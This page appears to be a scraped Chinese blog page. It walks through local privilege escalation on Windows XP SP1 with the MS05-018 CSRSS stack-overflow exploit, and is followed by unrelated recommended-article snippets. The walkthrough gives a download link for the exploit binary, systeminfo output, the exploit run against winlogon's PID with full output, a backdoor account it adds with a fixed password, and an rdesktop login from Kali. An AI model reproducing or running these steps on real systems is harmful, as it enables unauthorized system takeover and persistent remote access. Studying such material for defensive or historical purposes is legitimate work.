MS05-018

MS05-018

Works for Windows 2K SP3/4 | Windows XP SP1/2

Download ms05-018.exe:

https://github.com/xiaoxiaoleo/windows_pentest_tools/tree/master/提权工具/windows提权工具/MS05018—CSRSS.EXE漏洞利用/MS05018—CSRSS.EXE漏洞利用/tool

C:\WINDOWS\system32>systeminfo

systeminfo

Host Name:                 VULNBOX

OS Name:                   Microsoft Windows XP Professional

OS Version:                5.1.2600 Service Pack 1 Build 2600

Processor(s):              1 Processor(s) Installed.

                           [01]: x86 Family 6 Model 12 Stepping 2 GenuineIntel ~3457 Mhz

BIOS Version:              INTEL  - 6040000

Windows Directory:         C:\WINDOWS

System Directory:          C:\WINDOWS\System32

Boot Device:               \Device\HarddiskVolume1

System Locale:             en-us;English (United States)

Input Locale:              en-us;English (United States)

Time Zone:                 (GMT) Greenwich Mean Time : Dublin, Edinburgh, Lisbon, London

Hotfix(s):                 3 Hotfix(s) Installed.

                           [01]: File 1

                           [02]: Q147222

                           [03]: KB893803v2 - Update

C:\Inetpub\wwwroot>MS05-018.exe

ms5.exe

MS05-018 windows CSRSS.EXE Stack Overflow exp v1.0

Affect: Windows 2000 sp3/sp4 (all language)

Coded by eyas <eyas at xfocus.org> --->http://www.xfocus.net

compile by Iceskysl [IST] --->www.iceskysl.net

Usage: ms5.exe pid

[+] PID=440 Process=winlogon.exe

C:\Inetpub\wwwroot>MS05-018.exe 440

ms5.exe 440

MS05-018 windows CSRSS.EXE Stack Overflow exp v1.0

Affect: Windows 2000 sp3/sp4 (all language)

Coded by eyas <eyas at xfocus.org> --->http://www.xfocus.net

compile by Iceskysl [IST] --->www.iceskysl.net

[+] FreeConsole ok.

[+] AllocConsole ok.

[+] Get Console Title OK:"ms5.exe 440"

[+] bingo! found hwnd=70038

[+] start search "FF E4" in ntdll.dll

[+] found "FF E4"(jmp esp) in 77FB59CC[ntdll.dll]

[+] CreateFileMapping OK!

[+] MapViewOfFile OK!

[+] Send Exploit!

[+] Done.

It's will successful  add user :

username=e

password=asd#321

root@kali:~# rdesktop -u e -p asd#321  x.x.x.x

Windows XP SP1 Privilege Escalation的更多相关文章

  1. OD: Heap in Windows 2K & XP SP1

    Windows 堆溢出 MS 没有完全公开 Windows 的堆管理细节,目前对 Windows 堆的了解主要基于技术狂热者.黑客.安全专家.逆向工程师等的个人研究成果. 目前 Windows NT4 ...

  2. Windows XP系统服役13年今正式退休

    清明已过,服役13年的微软Windows XP系统也于今日正式“退休”.尽管这之后XP系统仍可以继续使用,但微软不再提供官方服务支持.对于中国数以亿计的XP用户来说,一方面是对已经使用了13年的操作系 ...

  3. Windows XP系列全下载(均为MSDN原版)

    正版windows xp sp3 下载大全(附:正版密钥) 微软MSDN Windows XP Professional下载 Windows XP Professional 简体中文 (最原始版本,无 ...

  4. [EXP]Microsoft Windows - DfMarshal Unsafe Unmarshaling Privilege Escalation

    Windows: DfMarshal Unsafe Unmarshaling Elevation of Privilege (Master) Platform: Windows (not tested ...

  5. 解决libcurl7.50.3在windows XP SP3 VC++ 6.0下编译报错 unresolved external symbol __imp__IdnToAscii@20 unresolved external symbol __imp__IdnToUnicode@20

    错误重现: --------------------Configuration: curl - Win32 LIB Debug DLL Windows SSPI DLL WinIDN--------- ...

  6. Linux/Unix System Level Attack、Privilege Escalation(undone)

    目录 . How To Start A System Level Attack . Remote Access Attack . Local Access Attack . After Get Roo ...

  7. 技术文集:万能WINDOWS XP封装

    这里将系统封装分为3步:做系统.封装.部署 一.做系统 平台不限,但不建议在虚拟机上制作.CPU及主板芯片没有限制,关于intelide和intelppm的不兼容问题,深度白金3in1并没有删除这些注 ...

  8. WinSetupFromUSB – Install Windows XP from USB Flash Drive

    http://myeeeguides.wordpress.com/2008/11/15/winsetupfromusb-install-windows-xp-from-usb-flash-drive/ ...

  9. 原版Windows XP Pro With SP3 VOL MSDN简体中文专业版

    2008年5月2日,微软推出Windows XP Pro With SP3 VOL MSDN x86 32位简体中文专业版,这是最经典也是我最喜爱的操作系统之一.在MSDN(微软开发者网络)的网站上查 ...

随机推荐

  1. 【vim环境配置】解决ubuntu上 由YouCompleteMe插件配置不当引起的 自动补全失效的问题

    背景: 由于不可抗拒的原因,学习环境由之前centos的一台机器上,变成了ubuntu的一台机器上.因此,需要在新的ubuntu的机器上再配置一次vim环境.算起来这已经是第三次配置vim环境了(ma ...

  2. [转][赞]Android开发者必知的开发资源

    英文原文:Bongzimo  翻译: ImportNew-黄小非 随着Android平台市场份额的持续猛增 ,越来越多的开发者开始投入Android应用程序的开发大潮.如果您是一位2013年刚刚入行的 ...

  3. 「日常训练」 Mike and Fun (CFR305D2B)

    题意(CodeForces 548B) 每次对01矩阵中的一位取反,问每次操作后,单列中最长连续1的长度. 分析 非常非常简单,但是我当时训练的时候WA了四次...无力吐槽了,人间 不值得.jpg 代 ...

  4. zabbix 2.2 调小监控值

    zabbix_agent默认disk下小于0%告警 调小到5% 组态 > 模板 选择需要的模板的触发器 例如 Template OS Windows 选择触发器 - 探索规则 - 触发器类型  ...

  5. mysql 数据库 exists 和count

    由于最近在使用exists是出现了一个小问题,但是在调试的时候费了不少时间,因为自己只是牢固造成,所以在在此记录,已提醒自己. mysql中exists 用法: 通过和主查询管理 以达到过滤的效果,如 ...

  6. css字体图标的制作和使用。

    css字体图标的制作和使用. 在项目开发的过程中,我们会经常用到一些图标.但是我们在使用这些图标时,往往会遇到失真的情况,而且图片数量很多的话,页面加载就越慢.所以,我们可以使用字体图标的方式来显示图 ...

  7. XML中的DTD语法

    DTD(Document Type Definition),全称为文档类型定义. 文件清单:book.xml <?xml version="1.0" ?> <!D ...

  8. HDFS集群和YARN集群

    Hadoop集群环境搭建(一)   1集群简介 HADOOP集群具体来说包含两个集群:HDFS集群和YARN集群,两者逻辑上分离,但物理上常在一起 HDFS集群: 负责海量数据的存储,集群中的角色主要 ...

  9. DataBase -- JOIN

    SQL JOIN:用于根据两个或多个表中列的关系,从这些表中查数据. (为了得到完整数据,我们需要从两个或多个表中获取结果.) 例如W3School中列出的实例,使用如下语句: select Pers ...

  10. 51nod 1819 黑白树V2(树链剖分)

    第一次写如此复杂的树链剖分, 感觉自己代码能力还是挺不错的,没有调试太久(2个小时) 最后代码量高达11K orz(大部分都是重复的线段树代码,以后可以考虑优化一下代码量) 题解: 首先就是要进行一次 ...